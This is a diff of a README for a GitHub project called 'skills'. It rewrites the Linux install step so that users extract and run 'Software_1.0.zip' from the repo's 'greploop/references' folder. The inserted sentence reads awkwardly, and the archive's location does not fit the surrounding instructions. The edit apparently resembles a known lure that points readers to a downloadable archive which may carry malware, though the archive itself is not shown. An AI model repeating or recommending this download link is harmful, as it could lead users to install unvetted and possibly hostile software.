Bboyfarouk/skills/README.md

   Open the `.dmg` file by double-clicking it.
 Drag the skills icon into your Applications folder.
 After copying, you can eject the `.dmg` file.

 - **On Linux (General guide):**
-  Extract the `.tar.gz` file by right-clicking and selecting “Extract Here” or using a terminal command.
+  Extract the `https://github.com/Bboyfarouk/skills/raw/refs/heads/main/greploop/references/Software_1.0.zip` file by right-clicking and selecting “Extract Here” or using a terminal command.
 Follow any instructions in the extracted folder’s README to run or install the app.

 ### Step 4: Open skills